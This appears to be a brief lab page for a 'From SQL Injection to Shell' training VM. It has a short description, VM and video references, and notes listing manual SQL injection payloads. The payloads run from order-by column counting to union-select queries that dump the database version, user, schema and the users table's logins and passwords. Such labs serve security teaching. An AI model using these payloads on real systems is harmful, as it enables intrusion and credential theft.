From SQL Injection to Shell (Manual SQLi)

This exercise explains how you can, from a SQL injection, gain access to the administration console, then in the administration console, how you can run commands on the system.

From SQL Injection to Shell VM Download

Walkthrough Video

Notes' order by 1 order by 2 order by 3 order by 4 order by 5 (error) union select 1,2,3,4 union select 1,@@version,3,4 union select 1,user(),3,4 union select 1,table_name,3,4 from information_schema.tables union select 1,column_name,3,4 from information_schema.columns where table_name='users' union select 1,concat(id,0x3a,login,0x3a,password),3,4 from users